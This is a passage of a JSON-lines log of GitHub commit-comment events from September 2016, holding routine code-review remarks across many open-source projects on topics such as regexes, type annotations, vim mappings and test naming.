/usr/local` so that `prefix` has a sensible default value, but can still be overriden\r\n* define `core_installdir := $(prefix)/lib/libretro` to avoid dumping everything in `$(prefix)/lib` but instead use a sub-directory for all the libretro things.\r\n\r\nI'm happy to send a pull request doing just that. :smiley: \r\n\r\n(alternatively, maybe even better would be to drop the hand-crafted `Makefile` and move to something better like the autotools or meson?)"}},"created_at":"2016-09-05T07:56:54Z"}
{"id":"4515563835","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18897121,"position":77,"line":115,"path":"src/wallOverlap.h","commit_id":"cf4731cc385d7281e510ef3546889657e10aeff6","created_at":"2016-09-05T07:56:58Z","updated_at":"2016-09-05T07:56:58Z","body":"true"}},"created_at":"2016-09-05T07:56:58Z"}
{"id":"4515565267","type":"CommitCommentEvent","actor":{"login":"oktawiraratama"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":18897123,"position":null,"line":null,"path":null,"commit_id":"a907b146828ddf44c045d6d9856ddf030113d32b","created_at":"2016-09-05T07:57:21Z","updated_at":"2016-09-05T07:57:21Z","body":"update 1.1.1.9 not found !!"}},"created_at":"2016-09-05T07:57:21Z"}
{"id":"4515566510","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18897125,"position":null,"line":null,"path":null,"commit_id":"3c6b153e60e7136b3f4b0b7549cbb482b9273b2b","created_at":"2016-09-05T07:57:40Z","updated_at":"2016-09-05T07:57:40Z","body":"Good to know, thanks!"}},"created_at":"2016-09-05T07:57:40Z"}
{"id":"4515568989","type":"CommitCommentEvent","actor":{"login":"encephalopathy"},"repo":{"name":"MonoGame/MonoGame"},"payload":{"comment":{"id":18897126,"position":null,"line":null,"path":null,"commit_id":"484fb87cea673fde87942b4632c120ae2b34aad6","created_at":"2016-09-05T07:58:22Z","updated_at":"2016-09-05T07:58:22Z","body":"What was the purpose behind removing the Storage classes?"}},"created_at":"2016-09-05T07:58:22Z"}
{"id":"4515570200","type":"CommitCommentEvent","actor":{"login":"BardiaKh"},"repo":{"name":"stephencwelch/Neural-Networks-Demystified"},"payload":{"comment":{"id":18897128,"position":null,"line":null,"path":null,"commit_id":"8be47212fa3eb49389741212da23efc6cdb68cec","created_at":"2016-09-05T07:58:41Z","updated_at":"2016-09-05T07:58:41Z","body":"After doing so, the difference between gradients would be enormous!!!"}},"created_at":"2016-09-05T07:58:41Z"}
{"id":"4515572328","type":"CommitCommentEvent","actor":{"login":"what137"},"repo":{"name":"what137/hellloWorl"},"payload":{"comment":{"id":18897132,"position":null,"line":null,"path":null,"commit_id":"fbc02556361f8bea4eefb49aebf546249bdd755e","created_at":"2016-09-05T07:59:16Z","updated_at":"2016-09-05T07:59:16Z","body":"aaa"}},"created_at":"2016-09-05T07:59:16Z"}
{"id":"4515573114","type":"CommitCommentEvent","actor":{"login":"miigotu"},"repo":{"name":"snamds/SickRage"},"payload":{"comment":{"id":18897134,"position":7,"line":348,"path":"sickbeard/common.py","commit_id":"196d0ebaddb2f501adc39a942acf9e50a38119ab","created_at":"2016-09-05T07:59:29Z","updated_at":"2016-09-05T07:59:29Z","body":"ep.vres only catches the screen size (720/1080/4096, not 720p or 720i), not the scan type. ep.scan is either 'p', 'i', or None/''"}},"created_at":"2016-09-05T07:59:29Z"}
{"id":"4515575300","type":"CommitCommentEvent","actor":{"login":"melix"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18897139,"position":28,"line":30,"path":"subprojects/docs/src/docs/release/notes.md","commit_id":"60bfd7dcce64d9a4e394148012e328ab365e0093","created_at":"2016-09-05T08:00:03Z","updated_at":"2016-09-05T08:00:03Z","body":":+1: "}},"created_at":"2016-09-05T08:00:03Z"}
{"id":"4515576383","type":"CommitCommentEvent","actor":{"login":"miigotu"},"repo":{"name":"snamds/SickRage"},"payload":{"comment":{"id":18897141,"position":2,"line":6,"path":"sickrage/recompiled/tags.py","commit_id":"196d0ebaddb2f501adc39a942acf9e50a38119ab","created_at":"2016-09-05T08:00:21Z","updated_at":"2016-09-05T08:00:21Z","body":"and this line would become:\r\nresolution = re.compile(r'(?P<vres>4320|2160|1080|720|480|360)(?P<scan>[pi])?', re.I)"}},"created_at":"2016-09-05T08:00:21Z"}
{"id":"4515577255","type":"CommitCommentEvent","actor":{"login":"miha-plesko"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18897143,"position":29,"line":28,"path":"pkg/providers/openstack/list_instances.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-05T08:00:32Z","updated_at":"2016-09-05T08:00:32Z","body":"Main reason was readability of code. \r\nI wanted `ListInstances()` function to be read as: first we read local state, then we fetch remote state and, if everything is ok, we override local state with fetched state and persist it.\r\n\r\nThe performance goodie that you've correctly observed came for free.\r\n"}},"created_at":"2016-09-05T08:00:32Z"}
{"id":"4515582561","type":"CommitCommentEvent","actor":{"login":"dferber90"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":18897152,"position":11,"line":9,"path":"src/utils/create-reducer.js","commit_id":"0a0d752c5c94b9f5dfcd8e64531c6640a6153d97","created_at":"2016-09-05T08:01:54Z","updated_at":"2016-09-05T08:01:54Z","body":"Couldn't `initialState` and `state` be of different types? e.g. `initialState` is `undefined` but after the first action, `state` is an object? Do we need union types to express this?\r\n\r\nThis is what the code would look like then, meaning the result is either of `initalState`'s type, or of the previous state's type.\r\n```js\r\nexport default function createReducer<T, X> (\r\n  initialState: T,\r\n  actionHandlers\r\n) {\r\n  return (state: X, action) : T | X => {\r\n```\r\n\r\n- https://flowtype.org/docs/functions.html#overloading\r\n- https://flowtype.org/docs/union-intersection-types.html\r\n\r\n---\r\n\r\nAfter thinking about it a bit more, the current code is probably correct. In this case, the incoming type `T` should already be a union of `undefined` and the state shape. Seems correct as is.\r\n\r\n"}},"created_at":"2016-09-05T08:01:54Z"}
{"id":"4515582829","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18897153,"position":null,"line":null,"path":null,"commit_id":"844e4ef7c95aa2930fcb5dc76f9c16affc6b8770","created_at":"2016-09-05T08:01:58Z","updated_at":"2016-09-05T08:01:58Z","body":"I'm curious, by what method did you obtain these values? :-)\r\nDon't look like values from SPSA, especially those ThreatByHangingPawn ones ..."}},"created_at":"2016-09-05T08:01:58Z"}
{"id":"4515587687","type":"CommitCommentEvent","actor":{"login":"codemedic"},"repo":{"name":"redmatter/docker-svn2git-workspace"},"payload":{"comment":{"id":18897164,"position":43,"line":20,"path":"get-authors.sh","commit_id":"c1574991a27ca104792bcdc03e27ffbc59641f73","created_at":"2016-09-05T08:03:17Z","updated_at":"2016-09-05T08:03:17Z","body":"`sort -u` ... wow ... never realised that it is possible wuth `sort`.\r\nsomething new everyday!"}},"created_at":"2016-09-05T08:03:17Z"}
{"id":"4515589883","type":"CommitCommentEvent","actor":{"login":"detlefziehlke"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18897172,"position":null,"line":null,"path":null,"commit_id":"f286c1c798a1c9bbd46f8ea79282d3d2e76af30f","created_at":"2016-09-05T08:03:49Z","updated_at":"2016-09-05T08:03:49Z","body":"Thanks a lot."}},"created_at":"2016-09-05T08:03:49Z"}
{"id":"4515590108","type":"CommitCommentEvent","actor":{"login":"huangdecai"},"repo":{"name":"huangdecai/emacs-config"},"payload":{"comment":{"id":18897174,"position":null,"line":null,"path":null,"commit_id":"802e8e37598127070e04cc4bfd78665c83e92861","created_at":"2016-09-05T08:03:53Z","updated_at":"2016-09-05T08:03:53Z","body":"高手的一些配置"}},"created_at":"2016-09-05T08:03:53Z"}
{"id":"4515592079","type":"CommitCommentEvent","actor":{"login":"dieguitoweb"},"repo":{"name":"FaridSafi/react-native-google-places-autocomplete"},"payload":{"comment":{"id":18897178,"position":null,"line":null,"path":null,"commit_id":"b45ffe821233f9480d9c3c1401843fc3976af9e1","created_at":"2016-09-05T08:04:27Z","updated_at":"2016-09-05T08:04:27Z","body":"@myaskevich Any news about the npm release?"}},"created_at":"2016-09-05T08:04:27Z"}
{"id":"4515592480","type":"CommitCommentEvent","actor":{"login":"tobiasdiez"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":18897180,"position":16,"line":41,"path":"src/main/java/net/sf/jabref/model/entry/BibEntry.java","commit_id":"a9eb978aef76717e1983eb0a2335e7d0d5af42c4","created_at":"2016-09-05T08:04:34Z","updated_at":"2016-09-05T08:04:34Z","body":"In my opinion, all these constants are implementation details of how the BibEntry (!) stores these information. Thus they should be encapsulated by the class and should not be visible outside. \r\nOf course you are right, that with the current code it is not easy to make this change. Some of the usages are really hard to replace (e.g. in Entry/FieldComparator) while other seem more tangibly (for example, I think the special treatment of TYPE_HEADER and KEY_FIELD in MainTableColumn and LayoutEntry is not necessary because `getResolvedField` already takes cares of these cases). \r\nThe Deprecated tag doesn't mean that all the usages should be replaced immediately, but that we try to remove them at some point (in the far future). In my opinion this is desirable with these constants."}},"created_at":"2016-09-05T08:04:34Z"}
{"id":"4515596870","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18897191,"position":null,"line":null,"path":null,"commit_id":"d2180cb45a36b701389c6ac3bb95082dae221058","created_at":"2016-09-05T08:05:47Z","updated_at":"2016-09-05T08:05:47Z","body":"hi just a suggestion. Able to add a feature in when heroes is full. Start powering up using 1* or 2* to 3* & 4* heroes ?"}},"created_at":"2016-09-05T08:05:47Z"}
{"id":"4515599245","type":"CommitCommentEvent","actor":{"login":"miha-plesko"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18897199,"position":69,"line":68,"path":"pkg/providers/openstack/list_instances.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-05T08:06:25Z","updated_at":"2016-09-05T08:06:25Z","body":"Wooops :smile: "}},"created_at":"2016-09-05T08:06:25Z"}
{"id":"4515604312","type":"CommitCommentEvent","actor":{"login":"rtroncy"},"repo":{"name":"DOREMUS-ANR/doremus-ontology"},"payload":{"comment":{"id":18897213,"position":null,"line":null,"path":null,"commit_id":"31f3118f7ece3604716bf09441e75525782deb99","created_at":"2016-09-05T08:07:47Z","updated_at":"2016-09-05T08:07:47Z","body":"No. Part of the changes are explainable since Protégé is just serializing a model which is in memory so it will not obviously materialize the triples in the same order. For simple editing, it is therefore wiser to edit directly the ontology. What is more worrying is what some new namespaces are added."}},"created_at":"2016-09-05T08:07:47Z"}
{"id":"4515609211","type":"CommitCommentEvent","actor":{"login":"ximifire"},"repo":{"name":"ndubrouskaya/test-task"},"payload":{"comment":{"id":18897218,"position":19,"line":15,"path":"style.css","commit_id":"8e147296f85daccb91e206b5635fc9c8ca0e4bf6","created_at":"2016-09-05T08:09:09Z","updated_at":"2016-09-05T08:09:09Z","body":"do not use :: only :"}},"created_at":"2016-09-05T08:09:09Z"}
{"id":"4515615413","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18897229,"position":5,"line":18,"path":"package.json","commit_id":"f72884be63ad8c194a28c300d2a82d153f9d345f","created_at":"2016-09-05T08:10:45Z","updated_at":"2016-09-05T08:10:45Z","body":"why you guys need the superagent-proxy?"}},"created_at":"2016-09-05T08:10:45Z"}
{"id":"4515615430","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"alaney/arduino-mavlink"},"payload":{"comment":{"id":18897230,"position":null,"line":null,"path":null,"commit_id":"4d71dc5eecd4dda262237081a07c07963e8136ef","created_at":"2016-09-05T08:10:46Z","updated_at":"2016-09-05T08:10:46Z","body":"It's OK friend...Thanks for replying"}},"created_at":"2016-09-05T08:10:46Z"}
{"id":"4515616808","type":"CommitCommentEvent","actor":{"login":"patrasap0908"},"repo":{"name":"patrasap0908/reflections"},"payload":{"comment":{"id":18897234,"position":null,"line":null,"path":null,"commit_id":"c7886ba6b8b03eddac0164dfeaf90f1bf3156b20","created_at":"2016-09-05T08:11:08Z","updated_at":"2016-09-05T08:11:08Z","body":"Why collaborate with GitHub?"}},"created_at":"2016-09-05T08:11:08Z"}
{"id":"4515617708","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18897236,"position":33,"line":33,"path":"tests/karma/unit/controllers/contacts-content.js","commit_id":"c587f2eb71ddb16b9fc855463fa3a1ba44b9cb59","created_at":"2016-09-05T08:11:20Z","updated_at":"2016-09-05T08:11:20Z","body":"You can delete this yeah?"}},"created_at":"2016-09-05T08:11:20Z"}
{"id":"4515618574","type":"CommitCommentEvent","actor":{"login":"KonajuGames"},"repo":{"name":"MonoGame/MonoGame"},"payload":{"comment":{"id":18897238,"position":null,"line":null,"path":null,"commit_id":"484fb87cea673fde87942b4632c120ae2b34aad6","created_at":"2016-09-05T08:11:35Z","updated_at":"2016-09-05T08:11:35Z","body":"The Storage APIs were designed to closely match the Xbox 360 APIs. Many of\nthe concepts in the Storage APIs do not map cleanly to other platforms,\nespecially systems such as UWP and other consoles including Xbox One.\n\nAt this stage it is best to use an existing API that is more cross platform\nsuch as IsolatedStorage or FileStream, or the platform-specific APIs.\n"}},"created_at":"2016-09-05T08:11:35Z"}
{"id":"4515621421","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18897243,"position":36,"line":36,"path":"tests/karma/unit/controllers/contacts-content.js","commit_id":"c587f2eb71ddb16b9fc855463fa3a1ba44b9cb59","created_at":"2016-09-05T08:12:20Z","updated_at":"2016-09-05T08:12:20Z","body":"This doesn't seem to actually test anything? I realise you might be looking for it to just not crash, but are there ways you can be more explicit about that?"}},"created_at":"2016-09-05T08:12:20Z"}
{"id":"4515624804","type":"CommitCommentEvent","actor":{"login":"RahmadaniBayuAji"},"repo":{"name":"RahmadaniBayuAji/cockpit"},"payload":{"comment":{"id":18897248,"position":null,"line":null,"path":null,"commit_id":"7a5178f1f0581ca4d53ea46e49e652fda75964ea","created_at":"2016-09-05T08:13:16Z","updated_at":"2016-09-05T08:13:16Z","body":"Sudo Systemctl Enable--Now Cokpit.Socket"}},"created_at":"2016-09-05T08:13:16Z"}
{"id":"4515627573","type":"CommitCommentEvent","actor":{"login":"zcorpan"},"repo":{"name":"w3c/csswg-drafts"},"payload":{"comment":{"id":18897253,"position":100,"line":2128,"path":"mediaqueries/Overview.bs","commit_id":"af397be9aca11109522ccfa51f5392aeb4eef045","created_at":"2016-09-05T08:14:00Z","updated_at":"2016-09-05T08:14:00Z","body":"Only privacy, no?"}},"created_at":"2016-09-05T08:14:00Z"}
{"id":"4515629473","type":"CommitCommentEvent","actor":{"login":"miha-plesko"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18897254,"position":44,"line":43,"path":"pkg/providers/openstack/run_instance.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-05T08:14:31Z","updated_at":"2016-09-05T08:14:31Z","body":"I agree."}},"created_at":"2016-09-05T08:14:31Z"}
{"id":"4515630517","type":"CommitCommentEvent","actor":{"login":"vendidero"},"repo":{"name":"vendidero/woocommerce-germanized"},"payload":{"comment":{"id":18897255,"position":null,"line":null,"path":null,"commit_id":"6742aa668aff94a0950888c75d8fc586ed4dd69a","created_at":"2016-09-05T08:14:47Z","updated_at":"2016-09-05T08:14:47Z","body":"Hi,\r\n\r\nbitte eröffne ein Issue dann kann ich das besser prüfen. Am besten du aktivierst mal WP_DEBUG bzw. wertest deine PHP Error Log-Datei aus, damit du eine konkrete Fehlermeldung erhältst. Wahrscheinlich liegt das an deiner ziemlich alten PHP Version."}},"created_at":"2016-09-05T08:14:47Z"}
{"id":"4515630780","type":"CommitCommentEvent","actor":{"login":"flniu"},"repo":{"name":"wklken/k-vim"},"payload":{"comment":{"id":18897256,"position":452,"line":391,"path":"vimrc","commit_id":"eaa5cf53219111314325a2ec9a73d17b820cc3b5","created_at":"2016-09-05T08:14:52Z","updated_at":"2016-09-05T08:14:52Z","body":"@bwangel23 查看：`:h map-ambiguous` `:h nowait` 再在当前帮助文件搜索nowait看看相关内容。\r\n我刚刚发现nowait只能和buffer一起用。\r\n```vim\r\n\" 手动执行以下命令进行测试\r\nmapclear | mapclear <buffer>\r\n\" 先清除预定义键映射，避免影响测试\r\nmap Y y$\r\ncmap : <C-R>\"\r\n\" 以下命令，可以按Y复制行，然后按::粘贴，再按回车执行\r\n\r\nmap <Leader>a  :echo 'global a'<CR>\r\n\" <Leader>a: 直接显示global a\r\nmap <Leader>aa :echo 'global aa'<CR>\r\n\" <Leader>a: 等一小会显示global a\r\n\" <Leader>aa: 直接显示global aa\r\nmap <buffer><nowait> <Leader>a  :echo 'local a'<CR>\r\n\" <Leader>a: 直接显示local a\r\n\" <Leader>aa: 直接显示local a然后进入insert-mode（相当于<Leader>a结果又按了a）\r\n```"}},"created_at":"2016-09-05T08:14:52Z"}
{"id":"4515633228","type":"CommitCommentEvent","actor":{"login":"piemar1"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18897264,"position":null,"line":null,"path":null,"commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T08:15:32Z","updated_at":"2016-09-05T08:15:32Z","body":"> Thank a lot for all comments and suggestions. \r\nI will answer and carry out changes in code."}},"created_at":"2016-09-05T08:15:32Z"}
{"id":"4515633727","type":"CommitCommentEvent","actor":{"login":"marcingrzejszczak"},"repo":{"name":"abesto/zipkin"},"payload":{"comment":{"id":18897265,"position":null,"line":null,"path":null,"commit_id":"ec23bad275ec0c40634d1d90b0217c00c6895d23","created_at":"2016-09-05T08:15:39Z","updated_at":"2016-09-05T08:15:39Z","body":"Geeez, it was ages ago wasn't it ;)"}},"created_at":"2016-09-05T08:15:39Z"}
{"id":"4515636836","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18897273,"position":9,"line":128,"path":"core/runtime.jvm/src/kotlin/jvm/internal/CallableReference.java","commit_id":"ecad306f42973f379a747e5ada12a515d868c12d","created_at":"2016-09-05T08:16:25Z","updated_at":"2016-09-05T08:16:25Z","body":"(We discussed this offline. In a nutshell, see [FinalWrapperFactory](https://shipilev.net/blog/2014/safe-public-construction/).)"}},"created_at":"2016-09-05T08:16:25Z"}
{"id":"4515645599","type":"CommitCommentEvent","actor":{"login":"rpasche"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":18897293,"position":null,"line":null,"path":null,"commit_id":"d75ac71f940866c3b51bfa22cd8fb1272fede3cf","created_at":"2016-09-05T08:18:32Z","updated_at":"2016-09-05T08:18:32Z","body":"Thanks @jdobes. Maybe can check it the next days."}},"created_at":"2016-09-05T08:18:32Z"}
{"id":"4515645645","type":"CommitCommentEvent","actor":{"login":"piemar1"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18897294,"position":40,"line":40,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T08:18:33Z","updated_at":"2016-09-05T08:18:33Z","body":"Sets are faster in iteration than lists, but doesn't keep information about the order of elements. It behaves as keys of a dict without a values. In this example we don't need information about the element order.  \r\nOk, I will prepare new code with win state detection during iteration of this list comprehension. \r\nAnd also I will prepare the same code with set comprehension."}},"created_at":"2016-09-05T08:18:33Z"}
{"id":"4515647122","type":"CommitCommentEvent","actor":{"login":"forwendy"},"repo":{"name":"forwendy/manage-ovuwork-online"},"payload":{"comment":{"id":18897296,"position":null,"line":null,"path":null,"commit_id":"99593b54b6d7aceef08df1c17f90ffc76653a455","created_at":"2016-09-05T08:18:54Z","updated_at":"2016-09-05T08:18:54Z","body":"提交更新"}},"created_at":"2016-09-05T08:18:54Z"}
{"id":"4515650851","type":"CommitCommentEvent","actor":{"login":"humility0310"},"repo":{"name":"humility0310/HelloWorld"},"payload":{"comment":{"id":18897305,"position":null,"line":null,"path":null,"commit_id":"dcbc86138b7a1592b48875b3ecbb242f38e1d811","created_at":"2016-09-05T08:19:53Z","updated_at":"2016-09-05T08:19:53Z","body":"dd"}},"created_at":"2016-09-05T08:19:53Z"}
{"id":"4515659270","type":"CommitCommentEvent","actor":{"login":"deependersingla"},"repo":{"name":"DeepAlphaPartners/CNN_tsc"},"payload":{"comment":{"id":18897320,"position":5,"line":378,"path":"simple/export.py","commit_id":"5624c632ec0ce8e58d12261948b105b6e4a5bde5","created_at":"2016-09-05T08:22:03Z","updated_at":"2016-09-05T08:22:03Z","body":"@tiag01 This look like a typo, I think this should be target_data rather than data_summary_last_pct?\r\nAny specific reason for using forward 20 days for the target data?"}},"created_at":"2016-09-05T08:22:03Z"}
{"id":"4515668698","type":"CommitCommentEvent","actor":{"login":"hwf452"},"repo":{"name":"hwf452/ios_20160905"},"payload":{"comment":{"id":18897333,"position":null,"line":null,"path":null,"commit_id":"dc02f23a614baaafeed52e75ce9346984a55deae","created_at":"2016-09-05T08:24:20Z","updated_at":"2016-09-05T08:24:20Z","body":"移植demo代码到你的项目中的时候需要注意两个地方.。编译设置：\r\n因为SDK采用的是C代码编写，所以需要应用设置混编设置:\r\n1、使用系统默认或选择stdlibc++模式编译。\r\n2、在第一次调用的地方，如demo中，更改AppDelegate.m文件的后缀为.mm如果不设置这两项，编译时出现std::错误。\r\n3、需要在other link flags 加上-ObjC字段，这样可以保证视频通话可以看到头像。"}},"created_at":"2016-09-05T08:24:20Z"}
{"id":"4515673186","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18897340,"position":44,"line":73,"path":"test/Smoke/st_locationsTest.js","commit_id":"39b34a5cce1d6502b4bafed86baee376daa65b2b","created_at":"2016-09-05T08:25:27Z","updated_at":"2016-09-05T08:25:27Z","body":"The testcase name is not following the standard .... \r\n\r\nMethod /<endpoint> \r\n\r\nAnd there are other tests too"}},"created_at":"2016-09-05T08:25:27Z"}
{"id":"4515674312","type":"CommitCommentEvent","actor":{"login":"stomar"},"repo":{"name":"ruby/www.ruby-lang.org"},"payload":{"comment":{"id":18897364,"position":null,"line":null,"path":null,"commit_id":"39710ff5e4a4bb23691375afe72b8ba562c4469e","created_at":"2016-09-05T08:25:43Z","updated_at":"2016-09-05T08:25:43Z","body":"Thanks. Fixed some typos in 3363a8f6f67bb7b4152840fc799219867d45bb8d."}},"created_at":"2016-09-05T08:25:43Z"}
{"id":"4515677447","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18897367,"position":12,"line":45,"path":"core/descriptors.runtime/src/org/jetbrains/kotlin/load/kotlin/reflect/RuntimeModuleData.kt","commit_id":"03a0a3e4db0f648ff70135c19317d5781da15d47","created_at":"2016-09-05T08:26:30Z","updated_at":"2016-09-05T08:26:30Z","body":"This property is now unused, isn't it?"}},"created_at":"2016-09-05T08:26:30Z"}
{"id":"4515682279","type":"CommitCommentEvent","actor":{"login":"akrystian"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18897377,"position":24,"line":24,"path":"tools/dbMigrations/src/main/java/migrator/CliOptions.java","commit_id":"8a8e2981b89d09489c574477c11dd5e9984af22b","created_at":"2016-09-05T08:27:40Z","updated_at":"2016-09-05T08:27:40Z","body":"Fixed."}},"created_at":"2016-09-05T08:27:40Z"}
{"id":"4515682577","type":"CommitCommentEvent","actor":{"login":"miguno"},"repo":{"name":"mkhq/kafka-qs-verify"},"payload":{"comment":{"id":18897378,"position":59,"line":59,"path":"src/main/scala/Topologies.scala","commit_id":"d36c62cd8dbedd1229ca439a071da7c9818704f0","created_at":"2016-09-05T08:27:45Z","updated_at":"2016-09-05T08:27:45Z","body":"Any particular reason why you are not using SAM here to simplify this code to sth like the following?\r\n\r\n```scala\r\n.map((k, v) => new KeyValue(v.toLowerCase, v))\r\n```"}},"created_at":"2016-09-05T08:27:45Z"}
{"id":"4515684921","type":"CommitCommentEvent","actor":{"login":"akrystian"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18897382,"position":30,"line":30,"path":"tools/dbMigrations/src/test/java/MigrationExecutorTest.java","commit_id":"8a8e2981b89d09489c574477c11dd5e9984af22b","created_at":"2016-09-05T08:28:21Z","updated_at":"2016-09-05T08:28:21Z","body":"Fixed - Change into JUnit rule."}},"created_at":"2016-09-05T08:28:21Z"}
{"id":"4515685779","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18897384,"position":40,"line":40,"path":"tic_tac_toe.py","commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T08:28:32Z","updated_at":"2016-09-05T08:28:32Z","body":"Not quite correct.\r\n\r\nSets are usually slower to iterate over, but *lookups* can be done in O(1) time, on average."}},"created_at":"2016-09-05T08:28:32Z"}
{"id":"4515687318","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"piemar1/Tic-tac-toe"},"payload":{"comment":{"id":18897389,"position":null,"line":null,"path":null,"commit_id":"ff98b726c34100bb46cbab8e37d78b19c396bb24","created_at":"2016-09-05T08:28:54Z","updated_at":"2016-09-05T08:28:54Z","body":"Code changes are unnecessary."}},"created_at":"2016-09-05T08:28:54Z"}
{"id":"4515687632","type":"CommitCommentEvent","actor":{"login":"ErkanOzdemir"},"repo":{"name":"vendidero/woocommerce-germanized"},"payload":{"comment":{"id":18897390,"position":null,"line":null,"path":null,"commit_id":"6742aa668aff94a0950888c75d8fc586ed4dd69a","created_at":"2016-09-05T08:28:58Z","updated_at":"2016-09-05T08:28:58Z","body":"Mach ich, der debug liefert nicht wirklich was\n\nBeste Grüße | Saygılarımla | Best Regards\n\nErkan Özdemir\n\nDüsseldorfer Straße 464\n47055 Duisburg\n\nMobil: +49 1522 9024385\nFax: +49 203 39204904\n\nhttp://eoz-design.de\n\n\n> Am 05.09.2016 um 10:14 schrieb Dennis Nissle <notifications@github.com>:\n> \n> Hi,\n> \n> bitte eröffne ein Issue dann kann ich das besser prüfen. Am besten du aktivierst mal WP_DEBUG bzw. wertest deine PHP Error Log-Datei aus, damit du eine konkrete Fehlermeldung erhältst. Wahrscheinlich liegt das an deiner ziemlich alten PHP Version.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-05T08:28:58Z"}
{"id":"4515690168","type":"CommitCommentEvent","actor":{"login":"akrystian"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18897393,"position":86,"line":86,"path":"tools/dbMigrations/src/test/java/MigrationExecutorTest.java","commit_id":"8a8e2981b89d09489c574477c11dd5e9984af22b","created_at":"2016-09-05T08:29:37Z","updated_at":"2016-09-05T08:29:37Z","body":"I can't reproduce. For me works fine on IDE and on maven build."}},"created_at":"2016-09-05T08:29:37Z"}
{"id":"4515690885","type":"CommitCommentEvent","actor":{"login":"fommil"},"repo":{"name":"cask/cask"},"payload":{"comment":{"id":18897394,"position":5,"line":685,"path":"cask.el","commit_id":"c85700d8fb3522cb3f26bc0c668c90dd451ecd5c","created_at":"2016-09-05T08:29:48Z","updated_at":"2016-09-05T08:29:48Z","body":"most of our tests were written before we used cask. Happy to accept a PR to rewrite!"}},"created_at":"2016-09-05T08:29:48Z"}
{"id":"4515694252","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18897402,"position":36,"line":140,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/TypeDeserializer.kt","commit_id":"03a0a3e4db0f648ff70135c19317d5781da15d47","created_at":"2016-09-05T08:30:35Z","updated_at":"2016-09-05T08:30:35Z","body":"I'd avoid using the term \"default type\" here. Maybe something like `computeLocalClassifierReplacementType`?"}},"created_at":"2016-09-05T08:30:35Z"}
{"id":"4515694703","type":"CommitCommentEvent","actor":{"login":"akrystian"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18897404,"position":null,"line":null,"path":null,"commit_id":"8a8e2981b89d09489c574477c11dd5e9984af22b","created_at":"2016-09-05T08:30:41Z","updated_at":"2016-09-05T08:30:41Z","body":"Fixed - I improved documentation."}},"created_at":"2016-09-05T08:30:41Z"}
{"id":"4515696214","type":"CommitCommentEvent","actor":{"login":"sserg91"},"repo":{"name":"viatsko/node-parser3"},"payload":{"comment":{"id":18897406,"position":1,"line":20,"path":"README.md","commit_id":"55b085741ed4487a451caaa25847071b04c8253c","created_at":"2016-09-05T08:31:02Z","updated_at":"2016-09-05T08:31:02Z","body":"127.0.0.1:3000/"}},"created_at":"2016-09-05T08:31:02Z"}
{"id":"4515696482","type":"CommitCommentEvent","actor":{"login":"akrystian"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18897408,"position":28,"line":28,"path":"tools/dbMigrations/src/main/java/migrator/CliOptions.java","commit_id":"8a8e2981b89d09489c574477c11dd5e9984af22b","created_at":"2016-09-05T08:31:06Z","updated_at":"2016-09-05T08:31:06Z","body":"Fixed."}},"created_at":"2016-09-05T08:31:06Z"}
